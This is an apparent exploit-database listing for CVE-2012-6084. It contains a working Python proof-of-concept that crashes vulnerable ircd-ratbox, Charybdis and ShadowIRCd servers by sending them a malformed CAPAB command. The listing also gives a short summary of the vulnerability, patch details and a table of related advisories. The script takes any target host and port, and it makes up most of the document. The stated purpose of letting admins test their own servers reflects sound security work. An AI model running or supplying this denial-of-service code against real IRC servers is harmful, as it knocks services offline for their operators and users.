Ratbox IRCd Denial Of Service

🗓️ 04 Jan 2013 00:00:00Reported by Aph3xType

packetstorm🔗 packetstormsecurity.com👁 30 Views

Ratbox IRCd Denial Of Service exploit using m_capab.c vulnerabilit

Reporter	Title	Published	Views	Family All 24
0day.today	Ratbox IRCd Denial Of Service	6 Jan 201300:00	–	zdt
CVE	CVE-2012-6084	1 Jan 201315:00	–	cve
Cvelist	CVE-2012-6084	1 Jan 201315:00	–	cvelist
Debian	[SECURITY] [DSA 2612-1] ircd-ratbox security update	24 Jan 201321:36	–	debian
Debian	[SECURITY] [DSA 2612-2] ircd-ratbox update	10 Feb 201318:37	–	debian
Debian CVE	CVE-2012-6084	1 Jan 201315:00	–	debiancve
Tenable Nessus	Debian DSA-2612-2 : ircd-ratbox - programming error	25 Jan 201300:00	–	nessus
Tenable Nessus	GLSA-201405-21 : Charybdis, ShadowIRCd: Denial of Service	19 May 201400:00	–	nessus
Tenable Nessus	Charybdis IRCd m_capab.c Denial of Service	11 Mar 201300:00	–	nessus
Tenable Nessus	ircd-ratbox m_capab.c Denial of Service	11 Mar 201300:00	–	nessus

`#!/usr/bin/python3  
###################################################################################  
#  
# _ _ .__ .__   
# __| || |_| | ____ ____ |__| ____ ____   
# \ __ / | _/ __ \ / ___\| |/ _ \ / \   
# | || || |_\ ___// /_/ > ( <_> ) | \ http://www.zempirians.com  
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /  
# |_||_| \/_____/ \/  
#  
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110  
#  
# Provided by: UberLame, Aph3x, Apetrick, O_O  
#  
###################################################################################  
#  
# -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-  
#  
# [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service  
#  
#  
###################################################################################  
# -=[ EXPLOIT ]=-  
#  
# Now that a patch has been secured we are releasing a proof of concept to test your  
# ircd against this vulnerability. This exploit was designed to work against  
# Shadowircd 6.3.3 running the following vulnerable code:  
#  
# +VULNERABLE+  
# ../shadowircd/modules/m_capab.c - LINE(40)  
# {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}  
#  
# -=[ SUMMARY ]=-  
#  
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug  
# caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all  
# versions since ircd-ratbox 2.0 are also vulnerable.)  
#   
# The bug has to do with server capability negotiation. A malformed request will  
# trigger a crash due to invalid assumptions.  
#  
# -=[ PATCH ]=-  
#  
# January 1, 2013 - 12:55 PM GMT-6  
#   
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an  
# integrated patch to resolve this issue. All admins should upgrade immediately.  
#  
# -=[ REFERENCE ]=-  
#  
# http://www.cvedetails.com/cve/CVE-2012-6084/  
#  
###################################################################################  
# Ohai, I Can Has Moar Cycles? <33  
#  
# Eg: ./<file>.py -t <target> -p <port>  
###################################################################################  
  
from argparse import ArgumentParser  
import socket  
  
  
def own( uri, port ):  
sock = socket.socket()  
try:  
ret = sock.connect_ex(( uri, int( port ) ))  
except:  
print( "\t[-] Failed To Connect To {}".format( uri ) )  
exit()  
  
print( "\t[+] Connected, Sending Payload To {}:{}".format( uri, port ) )  
while True:  
try:  
sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")  
except socket.error as se:  
print( '\t[!] Owned <3' )  
break  
  
sock.close()  
  
if __name__ == '__main__':  
parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )  
  
parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )  
parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )  
  
args = parser.parse_args()  
  
own( args.target, args.port )  
`

04 Jan 2013 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.00463